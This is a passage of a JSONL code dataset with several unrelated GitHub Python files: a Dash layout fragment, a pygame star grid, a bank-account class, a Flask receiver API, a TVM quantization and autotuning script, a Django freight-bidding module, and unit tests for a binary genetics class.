html.Div([\n html.Br(),\n html.Br(),\n dcc.RadioItems(\n id='page-2-radios',\n options=[{'label': i, 'value': i} for i in choices],\n value='Comparison of Models'\n ),\n ],className='three columns'),\n html.Div([\n dcc.Graph(id='page-2-graphic')\n ],className='nine columns',style = {'width': '100%', 'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}),\n ], className=' twelve columns')\n\n\n\n\n])\n","repo_name":"piushvaish/instagram-growth-tool","sub_path":"notebooks/dash-app/tabs/tab_3.py","file_name":"tab_3.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"15942976947","text":"\"\"\"\n13-1. Stars\nFind an image of a star. 
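The `maximumProduct.py` record above tracks two minima and three maxima by hand in a single pass. The same reasoning with `heapq` — an alternative sketch, not the original author's code: the answer is either the product of the three largest values, or the two smallest values (possibly large-magnitude negatives) times the largest.

```python
import heapq

def maximum_product(nums):
    a, b, c = heapq.nlargest(3, nums)   # three largest values
    x, y = heapq.nsmallest(2, nums)     # two smallest (possibly negative)
    return max(a * b * c, x * y * a)

assert maximum_product([1, 2, 3, 4]) == 24
assert maximum_product([-10, -10, 5, 2]) == 500   # two negatives pair with the max
```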
Make a grid of stars appear on the screen.\n\"\"\"\nimport sys\nimport pygame\nfrom pygame.sprite import Sprite\n\nclass Star(Sprite):\n \"\"\"A class to represent a single star.\"\"\"\n\n def __init__(self, screen):\n \"\"\"Initialize the star and set its starting position.\"\"\"\n super().__init__()\n self.screen = screen\n\n # Load the star image and set its rect attribute.\n self.image = pygame.image.load('star.bmp')\n self.rect = self.image.get_rect()\n\n # Create each new star near the top left of the screen.\n self.rect.x = self.rect.width\n self.rect.y = self.rect.height\n\n # Store the star's exact horizontal position.\n self.x = float(self.rect.x)\n\n# Initialize attributes\npygame.init()\nbg_color = (10, 10, 20)\nscreen_width = 1375\nscreen_height = 750\nsurface = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"13-1 - Stars\")\nsurface.fill(bg_color)\nstars = pygame.sprite.Group()\n\n# Create a star and find the number of stars in a row.\n# Spacing between each star is equal to one star width.\nstar = Star(surface)\nstar_width, star_height = star.rect.size\navailable_space_x = screen_width - (2 * star_width)\nnumber_stars_x = (available_space_x // (2 * star_width)) + 1\n\n# Determine the number of rows of stars that fit on the screen.\navailable_space_y = (screen_height - (2 * star_height))\nnumber_rows = (available_space_y // (2 * star_height)) + 1\n\n# Create the fleet of stars.\nfor row_number in range(number_rows):\n for star_number in range(number_stars_x):\n star = Star(surface)\n star_width, star_height = star.rect.size\n star.x = star_width + 2 * star_width * star_number\n star.rect.x = star.x\n star.rect.y = star.rect.height + 2 * star.rect.height * row_number\n stars.add(star)\n\n\nwhile True:\n #Respond to keypresses and mouse events.\n for event in pygame.event.get():\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and\n event.key == pygame.K_q):\n sys.exit()\n\n stars.draw(surface)\n\n pygame.display.flip()\n ","repo_name":"xerifeazeitona/PCC_Alien_Invasion","sub_path":"exercises/13_01_stars/stars.py","file_name":"stars.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38651814296","text":"class BankAccount:\n\n def __init__(self, int_rate, balance): \n self.int_rate = int_rate\n self.balance = balance\n\n\n def deposit(self, amount):\n self.balance += amount\n if amount <= 0:\n raise Exception (\"The deposit has to be above $0.\")\n print(\"You deposit: $\", amount)\n print(f'Your balance is: $ {self.balance}')\n return self\n \n\n def withdraw(self, amount):\n self.balance -= amount\n if self.balance <= 0 :\n raise Exception (f'Insufficient funds: Charging a $5 fee. Now your balance is: $ {self.balance - 5 } Please contact the bank ASAP!')\n print(\"You withdraw: $\", amount)\n print(f'Your balance is: $ {self.balance}')\n return self\n\n\n def display_account_info(self): \n print(f'You balance is: $ {self.balance}')\n print(f'The interest rate is: $ {self.int_rate}')\n return self\n\n\n def yield_interest(self):\n if self.balance > 0:\n self.balance += self.balance * self.int_rate\n print(\"Congratulations! Your interest rate is on the way. Your balance is now: $ \" + str(self.balance))\n else:\n print(\"There is no interest rate at the moment. 
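The layout in `stars.py` above leaves a one-sprite margin at each edge and a one-sprite gap between sprites. That arithmetic, isolated so it runs without pygame (the 50-pixel star size is an example value, not from the source):

```python
def grid_counts(screen_w, screen_h, sprite_w, sprite_h):
    cols = (screen_w - 2 * sprite_w) // (2 * sprite_w) + 1
    rows = (screen_h - 2 * sprite_h) // (2 * sprite_h) + 1
    return cols, rows

def position(col, row, sprite_w, sprite_h):
    # Same formula as star.x / star.rect.y in the source.
    return sprite_w + 2 * sprite_w * col, sprite_h + 2 * sprite_h * row

print(grid_counts(1375, 750, 50, 50))   # (13, 7) on the 1375x750 screen above
print(position(0, 0, 50, 50))           # first star sits one sprite in: (50, 50)
```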
Please contact the bank for any further information.\")\n return self\n\n \n\nmr_a = BankAccount(0.01, 1000)\nmr_b = BankAccount(0.01, 500)\n\ntry:\n\n mr_a.deposit(500).deposit(200).deposit(100).withdraw(300).display_account_info().yield_interest()\n\n mr_b.deposit(400).deposit(100).withdraw(500).withdraw(400).withdraw(100).withdraw(100).display_account_info().yield_interest()\n\nexcept Exception as a:\n print(a)\n\n","repo_name":"TanapaPalmer/PYTHON","sub_path":"bank_account/bank_account.py","file_name":"bank_account.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"24177446156","text":"import json\nfrom flask import Blueprint, current_app, Response, request\nfrom pprint import pprint\nfrom time import sleep\n\nreceiver_template = Blueprint('receiver_template', __name__, template_folder='templates')\n\n\n@receiver_template.route('/', methods=['GET', 'PUT'])\ndef receiver():\n if request.method == 'GET':\n return show()\n elif request.method == 'PUT':\n return update()\n\n\ndef show():\n current_app.logger.info(\"get receiver \")\n receiverInfo = {\n 'on': current_app.rx.on,\n 'volume': current_app.rx.volume,\n 'input': current_app.rx.input,\n 'mute': current_app.rx.mute,\n 'inputs': current_app.rx.inputs()\n }\n\n return Response(response=json.dumps(receiverInfo), mimetype='application/json')\n\n\ndef update():\n current_app.logger.info(\"update receiver\")\n receiverInfo = request.json\n if 'on' in receiverInfo and current_app.rx.on != receiverInfo['on']:\n current_app.rx.on = receiverInfo['on']\n if current_app.rx.on:\n if 'volume' in receiverInfo and current_app.rx.volume != receiverInfo['volume']:\n current_app.rx.volume = receiverInfo['volume']\n if 'input' in receiverInfo and current_app.rx.input != receiverInfo['input']:\n current_app.rx.input = receiverInfo['input']\n if 'mute' in receiverInfo and current_app.rx.mute != receiverInfo['mute']:\n current_app.rx.mute = receiverInfo['mute']\n return Response(response=json.dumps(receiverInfo), mimetype='application/json')\n","repo_name":"terickson/receiver-api","sub_path":"routes/receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"29741684332","text":"from collections import namedtuple\nimport tvm\nfrom tvm import relay, autotvm\nfrom tvm import hago\nimport mxnet as mx\nimport numpy as np\nfrom mxnet import gluon\nimport logging\nimport os\nimport pickle\nimport time\nimport argparse\nimport tvm.relay.testing\nfrom tvm.contrib.debugger import debug_runtime\nfrom tvm.autotvm.tuner import XGBTuner, GATuner, RandomTuner, GridSearchTuner\n\n\nlogging.basicConfig(level=logging.DEBUG)\n\nConfig = namedtuple('Config', ['model', 'expected_acc'])\n# dev = tvm.device(target)\n\n# argparse\nparser = argparse.ArgumentParser(description = 'argparse')\n\nparser.add_argument('--dtype', '-p', required=False, default='fp32', help='fp32 or int8')\nparser.add_argument('--tune', '-t', required=False, default=False, help='tune or not')\nparser.add_argument('--debug', '-d', required=False, default=False, help='use debugger')\n\nargs = parser.parse_args()\n\n#### TUNING OPTION ####\nnetwork = \"resnet-18\"\nlog_file = \"%s-%s.log\" % (network, args.dtype)\ndtype = \"float32\"\n\ntuning_option = {\n \"log_filename\": log_file,\n \"tuner\": \"xgb\",\n \"n_trial\": 2000,\n \"early_stopping\": 600,\n \"measure_option\": 
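`bank_account.py` above returns `self` from every method, which is what makes the long `deposit().withdraw()` chains work; note, though, that its `deposit` mutates the balance before validating the amount. A small sketch of the same chaining pattern with validation first — an illustration, not a drop-in replacement:

```python
class Account:
    def __init__(self, balance=0):
        self.balance = balance

    def deposit(self, amount):
        if amount <= 0:
            raise ValueError('deposit must be positive')
        self.balance += amount
        return self                      # returning self enables chaining

    def withdraw(self, amount):
        if amount > self.balance:
            raise ValueError('insufficient funds')
        self.balance -= amount
        return self

print(Account(100).deposit(50).withdraw(30).balance)   # 120
```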
autotvm.measure_option(\n builder=autotvm.LocalBuilder(timeout=10),\n runner=autotvm.LocalRunner(number=20, repeat=3, timeout=4, min_repeat_ms=150),\n ),\n}\n\n# You can skip the implementation of this function for this tutorial.\ndef tune_tasks(\n tasks,\n measure_option,\n tuner=\"xgb\",\n n_trial=1000,\n early_stopping=None,\n log_filename=\"tuning.log\",\n use_transfer_learning=True,\n):\n # create tmp log file\n tmp_log_file = log_filename + \".tmp\"\n if os.path.exists(tmp_log_file):\n os.remove(tmp_log_file)\n\n for i, tsk in enumerate(reversed(tasks)):\n prefix = \"[Task %2d/%2d] \" % (i + 1, len(tasks))\n\n # create tuner\n if tuner == \"xgb\" or tuner == \"xgb-rank\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank\")\n elif tuner == \"ga\":\n tuner_obj = GATuner(tsk, pop_size=100)\n elif tuner == \"random\":\n tuner_obj = RandomTuner(tsk)\n elif tuner == \"gridsearch\":\n tuner_obj = GridSearchTuner(tsk)\n else:\n raise ValueError(\"Invalid tuner: \" + tuner)\n\n if use_transfer_learning:\n if os.path.isfile(tmp_log_file):\n tuner_obj.load_history(autotvm.record.load_from_file(tmp_log_file))\n\n # do tuning\n tsk_trial = min(n_trial, len(tsk.config_space))\n tuner_obj.tune(\n n_trial=tsk_trial,\n early_stopping=early_stopping,\n measure_option=measure_option,\n callbacks=[\n autotvm.callback.progress_bar(tsk_trial, prefix=prefix),\n autotvm.callback.log_to_file(tmp_log_file),\n ],\n )\n\n # pick best records to a cache file\n autotvm.record.pick_best(tmp_log_file, log_filename)\n os.remove(tmp_log_file)\n\n\ndef get_val_data(model_name,\n rec_val,\n batch_size,\n num_workers=4):\n rec_val = os.path.expanduser(rec_val)\n mean_rgb = [123.68, 116.779, 103.939]\n std_rgb = [58.393, 57.12, 57.375]\n \n def batch_fn(batch, ctx):\n data = gluon.utils.split_and_load(batch.data[0], ctx_list=ctx, batch_axis=0)\n label = gluon.utils.split_and_load(batch.label[0], ctx_list=ctx, batch_axis=0)\n return data, label\n\n img_size = 299 if model_name == 'inceptionv3' else 224\n val_data = mx.io.ImageRecordIter(\n path_imgrec = rec_val,\n preprocess_threads = num_workers,\n shuffle = True,\n batch_size = batch_size,\n resize = 256,\n data_shape = (3, img_size, img_size),\n mean_r = mean_rgb[0],\n mean_g = mean_rgb[1],\n mean_b = mean_rgb[2],\n std_r = std_rgb[0],\n std_g = std_rgb[1],\n std_b = std_rgb[2],\n )\n return val_data, batch_fn\n\n\ndef get_model(model_name, batch_size, qconfig, original=False, simulated=False, dataset=None):\n gluon_model = gluon.model_zoo.vision.get_model(model_name, pretrained=True)\n img_size = 299 if model_name == 'inceptionv3' else 224\n data_shape = (batch_size, 3, img_size, img_size)\n mod, params = relay.frontend.from_mxnet(gluon_model, {\"data\": data_shape})\n\n graph = hago.prerequisite_optimize(mod['main'], params=params)\n logging.debug('original')\n logging.debug(graph.astext(show_meta_data=False))\n\n if original:\n return graph, params\n\n with qconfig:\n logging.debug('current quantize config')\n logging.debug(hago.current_qconfig())\n hardware = hago.create_accelerator_description()\n space = hago.generate_search_space(graph, hardware)\n # tuner = hago.BatchedGreedySearchTuner(space, 'accuracy')\n tuner = hago.DefaultSetting(space, 'accuracy')\n # tuner = hago.GreedySearchTuner(space, 'accuracy') \n ctx = tvm.gpu()\n target = 'cuda'\n strategy, result = hago.search_quantize_strategy(graph, hardware, dataset, tuner, ctx, target)\n \n quantizer = hago.create_quantizer(graph, hardware, strategy)\n simulated_graph = quantizer.simulate()\n quantized_graph = 
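`tune_tasks()` in the TVM-HAGO `main.py` above selects a tuner through an if/elif chain. The same dispatch as a table — a sketch that reuses the tuner classes and constructor arguments exactly as they appear in the source imports, runnable only where `tvm` is installed:

```python
from tvm.autotvm.tuner import XGBTuner, GATuner, RandomTuner, GridSearchTuner

TUNERS = {
    'xgb':        lambda tsk: XGBTuner(tsk, loss_type='rank'),
    'xgb-rank':   lambda tsk: XGBTuner(tsk, loss_type='rank'),
    'ga':         lambda tsk: GATuner(tsk, pop_size=100),
    'random':     lambda tsk: RandomTuner(tsk),
    'gridsearch': lambda tsk: GridSearchTuner(tsk),
}

def make_tuner(name, tsk):
    try:
        return TUNERS[name](tsk)
    except KeyError:
        raise ValueError('Invalid tuner: ' + name)   # same error text as the source
```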
quantizer.quantize()\n canonic_graph = relay.qnn.transform.CanonicalizeOps()(tvm.IRModule.from_expr(quantized_graph))\n logging.debug('simulated graph')\n logging.debug(simulated_graph.astext(show_meta_data=False))\n logging.debug('quantize graph')\n logging.debug(quantized_graph.astext(show_meta_data=False))\n # logging.debug('canonicalized graph')\n # logging.debug(canonic_graph.astext(show_meta_data=False))\n # hago.inspect_graph_statistic(graph, hardware, strategy, dataset, ctx, target)\n return quantized_graph, params\n\n\ndef tune_eval(mod, params, tuning_opt, target='cuda', ctx=tvm.gpu(), log_interval=100):\n\n # extract workloads from relay program\n print(\"Extract tasks...\")\n \n # mod, params, input_shape, out_shape = get_network(network, batch_size=1)\n # mod = relay.Function(\n # mod.params, relay.nn.softmax(mod.body), None, mod.type_params, mod.attrs\n # )\n \n mod = tvm.IRModule.from_expr(mod)\n batch_size = 32\n input_shape = (batch_size, 3, 224, 224)\n output_shape = (batch_size, 1000)\n \n if args.tune: \n tasks = autotvm.task.extract_from_program(\n mod[\"main\"], target=target, params=params, ops=(relay.op.get(\"nn.conv2d\"),)\n )\n # run tuning tasks\n print(\"Tuning...\")\n # import pdb; pdb.set_trace()\n tune_tasks(tasks, **tuning_opt)\n\n with autotvm.apply_history_best(log_file):\n print(\"Compile...\")\n \n with relay.build_config(opt_level=3):\n graph, lib, params = relay.build(mod, target)\n \n if not args.debug:\n # create runtime module\n m = tvm.contrib.graph_runtime.create(graph, lib, ctx)\n\n elif args.debug:\n # create debug runtime\n m = debug_runtime.create(graph, lib, ctx, dump_root=\"/tmp/tvmdbg\")\n m.set_input(**params)\n \n ######################################################################\n # Time evaluator\n e = m.module.time_evaluator(\"run\", ctx, repeat=3)\n t = np.array(e().results)*1000\n print(\"time_evaluator: %.3fms (%.5fms)\"%(t.mean(), t.std()))\n ######################################################################\n\ndef get_calibration_dataset(dataset, batch_fn, num_samples=100):\n dataset.reset()\n batches = []\n for i, batch in enumerate(dataset):\n if i * dataset.batch_size > num_samples:\n break\n data, label = batch_fn(batch, [mx.cpu(0)])\n batches.append({'data': tvm.nd.array(data[0].asnumpy()),\n 'label': tvm.nd.array(label[0].asnumpy())})\n return hago.CalibrationDataset(batches)\n\n\ndef test_quantize(cfg, rec_val):\n \n # qconfig = hago.qconfig(skip_conv_layers=[0], log_file='temp.log')\n \n qconfig = hago.qconfig(use_channel_quantize=False, log_file='temp.log')\n batch_size = 32\n val_data, batch_fn = get_val_data(cfg.model, rec_val=rec_val, batch_size=batch_size)\n dataset = get_calibration_dataset(val_data, batch_fn)\n \n orig = True\n \n if(args.dtype == 'int8'):\n orig = False\n \n mod, params = get_model(cfg.model, batch_size, qconfig, dataset=dataset, original=orig)\n tune_eval(mod, params, tuning_option, target='cuda', ctx=tvm.gpu(0))\n\nif __name__ == \"__main__\":\n \n #TODO(for user): replace the line with the path to imagenet validation dataset\n # rec_val = \"~/tensorflow_datasets/downloads/manual/imagenet2012/val_rec.rec\"\n \n rec_val = \"./val.rec\"\n results = []\n configs = [\n Config('resnet18_v1', expected_acc=0.69),\n # Config('resnet50_v1', expected_acc=0.75),\n # Config('inceptionv3', expected_acc=0.76),\n # Config('mobilenet1.0', expected_acc=0.70)\n ]\n \n for config in configs:\n test_quantize(config, rec_val)\n 
\n","repo_name":"aiha-lab/TVM-HAGO-lab","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12864855679","text":"'''\nCreated on Oct 4, 2015\n\n@author: sumit\n'''\nfrom Djngo.settings import BASE_DIR\nfrom bid.models import *\nfrom datetime import datetime\nfrom itertools import count\nfrom collections import namedtuple\nfrom django.db.models import Max\nfrom bid.business.Registration import UserInformation\nfrom warnings import catch_warnings\nfrom string import upper\nfrom bid.ConstantsInfo import ConstantsInfo\nclass AddItem1(object):\n itcount=count(0) \n def addItem(self,itname,ittype,itdesc,itprice,ituserid,itclosingdate,itclosingtime,itpic,source,destination):\n dict={}\n '''\n self.itcount=self.itcount.next()\n \n #self.itcount=self.itcount.next()\n dict['itemname']=itname\n dict['itemtype']=ittype\n dict['itemdesc']=itdesc\n dict['source']=source\n dict['destination']=destination\n dict['itemimg']=itpic\n #dict['itpics']=itpic\n #fl=open(BASE_DIR+'/static/img/'+str(ituserid)+str(self.itcount)+\".jpg\",'wb+')\n #fl.write(itpic.read())\n #dict['itemimgpath']=str(ituserid)+str(self.itcount)+\".jpg\"\n dict['item_price']=itprice\n '''\n enddate=str(itclosingdate)+\" \"+str(itclosingtime)\n item_info=self.ConfirmValue(itname, ittype, itdesc,itpic, itprice, enddate, ituserid, source, destination,bid_confirm=None)\n dict['item_id']=item_info.id\n dict['item_name']=item_info.item_name\n dict['item_type']=item_info.item_type\n dict['item_info']=item_info.item_info\n dict['imgpath']=item_info.item_img_path\n dict['item_location']=item_info.item_location\n dict['item_destination']=item_info.item_destination\n dict['end_date']=item_info.bid_close_time\n dict['bid_start_price']=item_info.bid_start_price\n return dict\n \n def ConfirmValue(self,itname,ittype,itdesc,imgpath,itprice,enddate,ituserid,source,destination,bid_confirm=None):\n us=User_Info.objects.get(user_name=ituserid)\n dt=str(datetime.now().strftime('%d/%m/%Y %H:%M'))\n iteminfo=Item_Info(item_name=itname,item_type=ittype,item_info=itdesc,item_img_path=imgpath\n ,item_location=upper(source),item_destination=upper(destination),user_id=us,\n bid_start_time=dt,bid_close_time=enddate,bid_start_price=itprice,is_confirm=False)\n iteminfo.save()\n return iteminfo\n \n def ConfirmItem(self,item_id,confirm=None,delete=None):\n item=Item_Info.objects.filter(id=item_id)\n if confirm is not None:\n item.update(is_confirm=True)\n if delete is not None:\n item.delete() \n \n \n \n def item_info(self,userid,start_date=None,end_date=None,itemtype=None,item_location=None):\n item_list=Item_Info.objects.all().filter(user_id=userid).filter(is_confirm=True).order_by('bid_start_time')\n if start_date is not None:\n item_list=item_list.objects.get(bid_start_time=start_date)\n if end_date is not None:\n item_list=item_list.objects.get(bid_close_time=end_date).order_by('bid_close_time')\n if itemtype is not None:\n item_list=item_list.objects.get(item_type=itemtype)\n if item_location is not None:\n item_list=item_list.objects.get(item_location=item_location) \n return item_list\n \n def running_bid(self,userid,location,start_date=None,end_date=None,itemtype=None):\n running_bid_info=[]\n today=str(datetime.now().strftime('%d/%m/%y %H:%M'))\n bid_info=namedtuple('bid_info','id item_name item_type imgpath item_start_price item_max_price source destination bid_start_date bid_end_date')\n 
item_list=Item_Info.objects.all().filter(item_location=upper(location)).filter(bid_start_time__lte=today).filter(bid_close_time__gte=today).exclude(user_id=userid).order_by('bid_start_time')\n if start_date is not None:\n item_list=item_list.objects.get(bid_start_time__contains=start_date)\n if end_date is not None:\n item_list=item_list.objects.get(bid_close_time__cotains=end_date)\n if itemtype is not None:\n item_list=item_list.objects.get(item_type=itemtype) \n for item in item_list:\n id=item.id\n itnm=item.item_name\n ittype=item.item_type\n bidstartdate=item.bid_start_time\n bidclosedate=item.bid_close_time\n bidstartprice=item.bid_start_price\n imgpath=item.item_img_path\n source=item.item_location\n destination=item.item_destination\n itmax=item.bidding_info_set.values('bid_price').filter(item_id=item.id).aggregate(Max('bid_price')).values()[0]\n maxprice=None\n if itmax is not None:\n maxprice=itmax\n else:\n maxprice='bid not started'\n ip=bid_info(id,itnm,ittype,imgpath,bidstartprice,maxprice,source,destination,bidstartdate,bidclosedate)\n running_bid_info.append(ip)\n return running_bid_info\n\nclass ItemBidInfo:\n def item_info(self,item_id):\n iteminfo=namedtuple('iteminfo','id item_name item_type item_img_path item_desc bid_start_time bid_close_time bid_start_price source destination')\n item=Item_Info.objects.get(id=item_id)\n user_name=UserInformation(item.user_id_id,\"User\").Name\n it=iteminfo(item.id,item.item_name,item.item_type,item.item_img_path,item.item_info,item.bid_start_time,item.bid_close_time,item.bid_start_price,item.item_location,item.item_destination)\n return it\n def item_bid_info(self,item_id,usertype):\n bidinfolist=[] \n bid_info=Bidding_Info.objects.filter(item_id=item_id).order_by('-bid_price')[:10]\n if usertype==\"User\":\n bid_info_tuple=namedtuple('bid_info_tuple','bidder_name mobileno transportname bid_date bid_price')\n for item in bid_info:\n bidder_info=UserInformation(item.bid_person_id_id,ConstantsInfo.transporter)\n bidder_name=bidder_info.Name\n bidder_transportname=bidder_info.transport_name\n bidder_mobileno=bidder_info.Mobileno\n bid_date=item.bidding_date\n bid_price=item.bid_price\n bi=bid_info_tuple(bidder_name,bidder_mobileno,bidder_transportname,bid_date,bid_price)\n bidinfolist.append(bi)\n else:\n bid_info_tuple=namedtuple('bid_info_tuple','bidder_name transportname bid_date bid_price')\n for item in bid_info:\n bidder_info=UserInformation(item.bid_person_id_id,ConstantsInfo.transporter)\n bidder_name=bidder_info.Name\n bidder_transportname=bidder_info.transport_name\n bid_date=item.bidding_date\n bid_price=item.bid_price\n bi=bid_info_tuple(bidder_name,bidder_transportname,bid_date,bid_price)\n bidinfolist.append(bi) \n return bidinfolist\n def bidonitem(self,item_id,user_id,Amount):\n bid_item=Bidding_Info.objects.all().filter(item_id=item_id).filter(bid_person_id=user_id)\n today=str(datetime.now().strftime('%d/%m/%Y %H:%M'))\n if bid_item.count()!=0:\n bid_item.update(bid_price=Amount,bidding_date=today)\n else:\n bid_item=Bidding_Info(item_id=Item_Info.objects.all().get(id=item_id),bid_price=Amount,bidding_date=today,bid_person_id=Transporter_Info.objects.all().get(user_name=user_id))\n bid_item.save()\n \n def bidding_history(self,userid,source=None,destination=None,itemtype=None):\n bidding_history=[]\n item_list=None\n #item_info_tuple=namedtuple('item_info_tupe','item_name')\n today=str(datetime.now().strftime('%d/%m/%Y %H:%M'))\n bid_info=namedtuple('bid_info','id item_name item_type imgpath item_start_price 
your_price your_bid_date bid_start_date bid_end_date')\n bi=Bidding_Info.objects.all().filter(bid_person_id=userid).filter(is_Exit=False).order_by('-bidding_date')\n if source is not None or destination is not None or itemtype is not None:\n item_list=Item_Info.objects.all() \n if source is not None:\n item_list=item_list.objects.get(item_location=source)\n if destination is not None:\n item_list=item_list.objects.get(item_destination=destination)\n if itemtype is not None:\n item_list=item_list.objects.get(item_type=itemtype) \n \n for bit in bi:\n item=bit.item_id \n item_name=item.item_name\n itemtype=item.item_type\n itemprice=item.bid_start_price\n itimgath=item.item_img_path\n bidstartdate=item.bid_start_time\n bidclose=item.bid_close_time\n yourprice=bit.bid_price\n biddate=bit.bidding_date\n bif=bid_info(bit.item_id_id,item.item_name,itemtype,itimgath,itemprice,yourprice,biddate,bidstartdate,bidclose)\n bidding_history.append(bif)\n return bidding_history\n \n def ExitBid(self,item_id,userid):\n bi=Bidding_Info.objects.filter(item_id=item_id).filter(bid_person_id=userid).update(is_Exit=True)\n\n \n \n \n \n \n \n \n \n \n ","repo_name":"sumitchans/bid1.0","sub_path":"bid/business/ItemInfo.py","file_name":"ItemInfo.py","file_ext":"py","file_size_in_byte":9363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72854762631","text":"import unittest\nfrom unittest import mock\n\nimport numpy as np\n\nfrom sims.agents import genetics\n\nclass TestBinary(unittest.TestCase):\n def setUp(self):\n self.binary = genetics.Binary(6)\n\n def test_from_str(self):\n actual = genetics.Binary('0b110')\n expected = self.binary\n self.assertEqual(actual, expected)\n\n def test_from_str_prefix_zeros(self):\n actual = genetics.Binary('0b0110').literal\n expected = np.array([0, 1, 1, 0], dtype=np.uint8)\n np.testing.assert_array_equal(actual, expected)\n\n def test_from_array(self):\n actual = genetics.Binary(np.array([1, 1, 0]))\n expected = self.binary\n self.assertEqual(actual, expected)\n\n def test__str(self):\n actual = str(self.binary)\n expected = '0b110'\n self.assertEqual(actual, expected)\n\n def test__int(self):\n actual = int(self.binary)\n expected = 6\n self.assertEqual(actual, expected)\n\n def test__len(self):\n actual = len(self.binary)\n expected = 3\n self.assertEqual(actual, expected)\n\n def test__eq_true(self):\n other_binary = genetics.Binary(6)\n actual = other_binary == self.binary\n expected = True\n self.assertEqual(actual, expected)\n\n def test__eq_false_value(self):\n other_binary = genetics.Binary(5)\n actual = other_binary == self.binary\n expected = False\n self.assertEqual(actual, expected)\n\n def test__eq_false_prefix(self):\n other_binary = genetics.Binary('0b0110')\n actual = other_binary == self.binary\n expected = False\n self.assertEqual(actual, expected)\n\n def test__getitem_single_1(self):\n actual = self.binary[1]\n expected = genetics.Binary(1)\n self.assertEqual(actual, expected)\n\n def test__getitem_single_0(self):\n actual = self.binary[2]\n expected = genetics.Binary(0)\n self.assertEqual(actual, expected)\n\n def test__getitem_slice_all(self):\n actual = self.binary[:]\n expected = genetics.Binary(6)\n self.assertEqual(actual, expected)\n\n def test__get_item_slice_partial(self):\n actual = self.binary[1:]\n expected = genetics.Binary(2)\n self.assertEqual(actual, expected)\n\n def test__setitem(self):\n self.binary[:] = 0\n actual = self.binary\n expected = genetics.Binary('0b000')\n 
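`ItemInfo.py` above packages query rows into ad-hoc namedtuples (`bid_info`, `iteminfo`) before handing them to templates. A standalone sketch of that pattern with shortened field names and invented row data, including the `'bid not started'` fallback used in the source:

```python
from collections import namedtuple

BidInfo = namedtuple('BidInfo', 'item_name start_price max_price')

rows = [('load A', 1000, 1500), ('load B', 800, None)]
bids = [BidInfo(name, start, mx if mx is not None else 'bid not started')
        for name, start, mx in rows]
for b in bids:
    print(b.item_name, b.max_price)   # attribute access instead of tuple indexing
```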
self.assertEqual(actual, expected)\n\n def test_array_to_str(self):\n test_array = np.array([1, 1, 0])\n actual = genetics.Binary.array_to_str(test_array)\n expected = '0b110'\n self.assertEqual(actual, expected)\n\n def test_str_to_int(self):\n test_str = '0b110'\n actual = genetics.Binary(test_str)\n expected = genetics.Binary(6)\n self.assertEqual(actual, expected)\n\n def test_validate_literal_not_array(self):\n test_literal = 'hello'\n with self.assertRaises(ValueError):\n genetics.Binary.validate_literal(test_literal)\n\n def test_validate_literal_wrong_dtype(self):\n test_literal = np.array([1, 1, 0], dtype=np.uint16)\n with self.assertRaises(ValueError):\n genetics.Binary.validate_literal(test_literal)\n\n def test_validate_literal_true(self):\n test_literal = np.array([1, 1, 0], dtype=np.uint8)\n genetics.Binary.validate_literal(test_literal)\n\n def test_append_ndarray(self):\n self.binary.append(np.array([1, 0]))\n actual = self.binary\n expected = genetics.Binary(26)\n self.assertEqual(actual, expected)\n\n def test_append_binary(self):\n self.binary.append(genetics.Binary(2))\n actual = self.binary\n expected = genetics.Binary(26)\n self.assertEqual(actual, expected)\n\n def test_flip(self):\n self.binary.flip(2)\n actual = self.binary\n expected = genetics.Binary(7)\n self.assertEqual(actual, expected)\n\n @mock.patch('sims.agents.genetics.np.random.rand')\n def test_flip_random_0th_index(self, mock_rand):\n mock_rand.return_value = 0\n self.binary.flip_random()\n actual = self.binary\n expected = genetics.Binary('0b010')\n self.assertEqual(actual, expected)\n\n @mock.patch('sims.agents.genetics.np.random.rand')\n def test_flip_random_1st_index(self, mock_rand):\n mock_rand.return_value = .5\n self.binary.flip_random()\n actual = self.binary\n expected = genetics.Binary(4)\n self.assertEqual(actual, expected)\n\n @mock.patch('sims.agents.genetics.np.random.rand')\n def test_flip_random_2nd_index(self, mock_rand):\n mock_rand.return_value = 0.999\n self.binary.flip_random()\n actual = self.binary\n expected = genetics.Binary(7)\n self.assertEqual(actual, expected)\n\nclass TestNbit(unittest.TestCase):\n def setUp(self):\n self.nbit_a = genetics.Nbit(genetics.Binary(157), 2)\n self.nbit_b = genetics.Nbit(genetics.Binary(12), 2)\n\n @mock.patch('sims.agents.genetics.np.random.rand')\n def test_mutate_0th(self, mock_rand):\n mock_rand.return_value = 0\n self.nbit_a.mutate()\n actual = str(self.nbit_a.literal)\n expected = '0b00011101'\n self.assertEqual(actual, expected)\n\n @mock.patch('sims.agents.genetics.np.random.rand')\n def test_mutate_4th(self, mock_rand):\n mock_rand.return_value = 0.125 * 4\n self.nbit_a.mutate()\n actual = str(self.nbit_a.literal)\n expected = '0b10010101'\n self.assertEqual(actual, expected)\n\n @mock.patch('sims.agents.genetics.np.random.rand')\n def test_mutate_last(self, mock_rand):\n mock_rand.return_value = 0.125 * 7\n self.nbit_a.mutate()\n actual = str(self.nbit_a.literal)\n expected = '0b10011100'\n self.assertEqual(actual, expected)\n\n def test_append_nbit(self):\n self.nbit_a.append(self.nbit_b)\n actual = self.nbit_a.literal\n expected = genetics.Binary('0b100111011100')\n self.assertEqual(actual, expected)\n\n def test_append_Binary(self):\n self.nbit_a.append(self.nbit_b.literal)\n actual = self.nbit_a.literal\n expected = genetics.Binary('0b100111011100')\n self.assertEqual(actual, expected)\n\n def test_append_array(self):\n self.nbit_a.append(self.nbit_b.literal.literal)\n actual = 